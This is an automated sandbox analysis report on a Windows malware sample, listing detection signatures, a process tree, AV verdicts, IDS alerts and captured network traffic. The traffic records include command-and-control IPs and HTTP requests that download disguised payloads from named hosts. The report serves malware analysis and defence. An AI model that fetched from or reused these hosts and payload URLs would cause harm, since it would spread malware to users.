Windows Analysis Report
VZ7xFmeuPX.exe

Overview

General Information

Sample name: VZ7xFmeuPX.exe
renamed because original name is a hash value
Original sample name: 327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac.exe
Analysis ID: 1550312
MD5: c7b9fad6691e715033dacd193d65f5bf
SHA1: 521b8c1116408f448dec1f407e58a48a8564779a
SHA256: 327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac
Tags: exe, user-adrian__luca

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • VZ7xFmeuPX.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\VZ7xFmeuPX.exe" MD5: C7B9FAD6691E715033DACD193D65F5BF)
    • 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe (PID: 7512 cmdline: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe MD5: C62F27864C7A540CAFBD0BDA87D99468)
      • WMIC.exe (PID: 7956 cmdline: wmic BaseBoard get SerialNumber MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MiniThunderPlatform.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP MD5: D863E48A39F83476825B3B4F2379FCF1)
      • MiniThunderPlatform.exe (PID: 5956 cmdline: "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP MD5: D863E48A39F83476825B3B4F2379FCF1)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T16:40:16.065171+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.10 | 49763 | TCP
2024-11-06T16:40:56.326888+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.10 | 57357 | TCP
2024-11-06T16:40:17.575368+0100 | 2051639 | 1 | A Network Trojan was detected | 120.27.243.153 | 32520 | 192.168.2.10 | 49776 | TCP
2024-11-06T16:41:27.858250+0100 | 2051639 | 1 | A Network Trojan was detected | 120.27.243.153 | 32520 | 192.168.2.10 | 57358 | TCP
2024-11-06T16:42:37.974668+0100 | 2051639 | 1 | A Network Trojan was detected | 120.27.243.153 | 32520 | 192.168.2.10 | 57359 | TCP
2024-11-06T16:43:48.228709+0100 | 2051639 | 1 | A Network Trojan was detected | 120.27.243.153 | 32520 | 192.168.2.10 | 57360 | TCP
2024-11-06T16:40:27.941781+0100 | 2851825 | 1 | A Network Trojan was detected | 192.168.2.10 | 57267 | 140.206.225.136 | 80 | TCP

AV Detection

Source: VZ7xFmeuPX.exe, Avira: detected
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Avira: detection malicious, Label: TR/Kryptik.ianbq
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, ReversingLabs: Detection: 24%
Source: C:\Users\user\Desktop\AntiCheat.dll, ReversingLabs: Detection: 62%
Source: VZ7xFmeuPX.exe, ReversingLabs: Detection: 79%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 95.4% probability
Source: C:\Users\user\Desktop\AntiCheat.dll, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Joe Sandbox ML: detected
Source: VZ7xFmeuPX.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Code function: 7_3_6C652E50 IACEncrypt,7_3_6C652E50
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_00436C90 CryptQueryObject,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,LocalAlloc,CertGetNameStringW,??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,LocalFree,CertFreeCRLContext,LocalFree,CertCloseStore,CryptMsgClose,14_2_00436C90
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_004185E0 CryptMsgClose,14_2_004185E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_00418644 CryptMsgGetParam,14_2_00418644
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_0041830B CryptQueryObject,14_2_0041830B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_00436C90 CryptQueryObject,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,LocalAlloc,CertGetNameStringW,??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,LocalFree,CertFreeCRLContext,LocalFree,CertCloseStore,CryptMsgClose,15_2_00436C90
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_004185E0 CryptMsgClose,15_2_004185E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_00418644 CryptMsgGetParam,15_2_00418644
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_0041830B CryptQueryObject,15_2_0041830B
Source: VZ7xFmeuPX.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57286 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57312 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57337 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57338 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57330 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57336 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57331 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57334 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57333 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57332 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57335 version: TLS 1.0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, File opened: C:\Users\user\AppData\Local\Temp\download\MSVCR71.dll
Source: unknown, HTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57356 version: TLS 1.2
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X32.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr
Source: Binary string: atl71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\xlbugreport\bin\ReleseDll.vc7\XLBugHandler.pdb source: XLBugHandler.dll.7.dr
Source: Binary string: msvcp71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1726562366.000000007C3C1000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdb source: concrt140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.7.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb& source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: ^msvcr71.pdb\ source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcr71.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: atl71.pdbT source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdb source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdbGCTL source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: msvcr71.pdb0 source: MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr
Source: Binary string: e:\code_svn\xl_framework\xl_component\minizip\Release\minizip.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.dr
Source: Binary string: cp71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcp71.dll.7.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdbGCTL source: concrt140.dll.7.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: msvcr71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_00417E47 FindFirstFileW,14_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_0043DCBA FindFirstFileW,FindClose,14_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,14_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_10027330 FindFirstFileA,FindClose,14_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_00417E47 FindFirstFileW,15_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_0043DCBA FindFirstFileW,FindClose,15_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,15_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100272A0 FindFirstFileA,FindClose,15_2_100272A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10027330 FindFirstFileA,FindClose,15_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10071280

Networking

Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:49776
Source: Network trafficSuricata IDS: 2851825 - Severity 1 - ETPRO MALWARE Win32/Sogou.H Variant CnC Activity : 192.168.2.10:57267 -> 140.206.225.136:80
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57360
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57358
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57359
Source: global trafficTCP traffic: 192.168.2.10:49776 -> 120.27.243.153:32520
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 47.92.202.235:8000
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 111.206.4.176:8000
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 47.102.130.81:8000
Source: global trafficTCP traffic: 192.168.2.10:57222 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 112.64.218.154:80Content-type: application/octet-streamContent-Length: 252Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 188Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 112.64.218.154:80Content-type: application/octet-streamContent-Length: 124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 1388Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.219.22:80Content-type: application/octet-streamContent-Length: 44Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 1484Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 368Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 352Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 252Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 560Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.219.22:80Content-type: application/octet-streamContent-Length: 192Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 656Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: fc54e0d16d9764783542f0146a98b300
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.10:49763
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.10:57357
Source: global trafficHTTP traffic detected: GET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: download6.mcloud.139.comPragma: no-cacheReferer: https://download6.mcloud.139.com/storageWeb/servletUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themis HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Cache-Control: no-cacheHost: bjbgp01.baidupcs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlistPhotoUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /SLAppAssets101.to HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: skinx.x1.lolgezi.ccCache-Control: no-cache
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57286 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57312 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57337 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57338 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57330 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57336 version: TLS 1.0
